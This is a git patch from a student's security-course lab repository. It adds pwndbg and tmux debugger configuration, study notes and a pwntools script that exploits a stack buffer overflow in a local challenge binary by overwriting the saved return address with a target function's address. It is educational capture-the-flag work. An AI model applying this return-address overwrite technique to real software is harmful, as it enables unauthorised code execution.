From ef2aeb2e24a23de1781130e57eaebcd9e6decd58 Mon Sep 17 00:00:00 2001 From: Kaushik Narayan R Date: Thu, 10 Oct 2024 15:09:18 -0700 Subject: [PATCH] lab 4a, got some nice pwndbg layout config --- .gdb_split.py | 41 +++++++++++++++++++++++++++++++++++++++++ .gdbinit | 5 +++++ 4a/lab4a.py | 46 ++++++++++++++++++++++++++++++++++++++++++++++ Dojo Notes.md | 18 ++++++++++++++++++ 4 files changed, 110 insertions(+) create mode 100644 .gdb_split.py create mode 100644 .gdbinit create mode 100644 4a/lab4a.py diff --git a/.gdb_split.py b/.gdb_split.py new file mode 100644 index 0000000..263be8f --- /dev/null +++ b/.gdb_split.py @@ -0,0 +1,41 @@ +import atexit +import os +from pwndbg.commands.context import contextoutput, output, clear_screen + +bt = ( + os.popen('tmux split-window -P -F "#{pane_id}:#{pane_tty}" -d "cat -"') + .read() + .strip() + .split(":") +) +st = ( + os.popen( + f"tmux split-window -h -t {bt[0]} -P -F " + + '"#{pane_id}:#{pane_tty}" -d "cat -"' + ) + .read() + .strip() + .split(":") +) +re = ( + os.popen( + f"tmux split-window -h -t {st[0]} -P -F " + + '"#{pane_id}:#{pane_tty}" -d "cat -"' + ) + .read() + .strip() + .split(":") +) +di = ( + os.popen('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -d "cat -"') + .read() + .strip() + .split(":") +) +panes = dict(backtrace=bt, stack=st, regs=re, disasm=di) +for sec, p in panes.items(): + contextoutput(sec, p[1], True) +contextoutput("legend", di[1], True) +atexit.register( + lambda: [os.popen(f"tmux kill-pane -t {p[0]}").read() for p in panes.values()] +) diff --git a/.gdbinit b/.gdbinit new file mode 100644 index 0000000..74b8660 --- /dev/null +++ b/.gdbinit @@ -0,0 +1,5 @@ +source /opt/pwndbg/gdbinit.py +set context-stack-lines 20 +set context-sections disasm stack regs backtrace +source ~/.gdb_split.py + diff --git a/4a/lab4a.py b/4a/lab4a.py new file mode 100644 index 0000000..5e0ed09 --- /dev/null +++ b/4a/lab4a.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# This exploit template was generated via: +# $ pwn template +from pwn import * + +# Set up pwntools for the correct architecture +# context.update(arch='i386') +exe = '/challenge/run' + +# Many built-in settings can be controlled on the command-line and show up +# in "args". For example, to dump all data sent/received, and disable ASLR +# for all created processes... +# ./exploit.py DEBUG NOASLR + + + +def start(argv=[], *a, **kw): + '''Start the exploit against the target.''' + if args.GDB: + return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) + else: + return process([exe] + argv, *a, **kw) + +# Specify your GDB script here for debugging +# GDB will be launched if the exploit is run via e.g. +# ./exploit.py GDB +gdbscript = ''' +continue +'''.format(**locals()) + +#=========================================================== +# EXPLOIT GOES HERE +#=========================================================== + +io = start() + +unbound_buffer = 0x7ffd6f3ab780 +saved_rip = 0x7ffd6f3ab7c8 +offset = saved_rip-unbound_buffer + +target_fn = 0x401166 +payload = b'F' * (offset - len('records/')) + p64(target_fn) + b'\n' + +io.send(payload) +io.interactive() diff --git a/Dojo Notes.md b/Dojo Notes.md index 0444a43..18cf7f7 100644 --- a/Dojo Notes.md +++ b/Dojo Notes.md @@ -356,3 +356,21 @@ done ### .15 - blind leading the blind - basically, stdout and stderr for the child are set to `/dev/null` so instead of spawning root shell, use `cat flag > output` and read output + +### .16 - arg wars VI - return of the hacker + +- decompiler showed set of filtered characters, quotes and backslashes are not there +- also .17 checks for backslashes, so i assume backslashes solves this +- but i got stuck, TA said try the 'prequels' first then come back lol + +### lab 4a.1 - easy overflow + +- standard buffer overflow vuln +- gdb shenanigans +- shift-ctrl-@ inserts a null character it seems (remember for .16) +- enough gdb, let's move to big guns - pwntools +- checksec says no stack canary or PIE +- all g then +- calculate offset from vulnerable variable location to saved RIP(return instruction pointer) location +- get address of target function to execute +- craft payload accordingly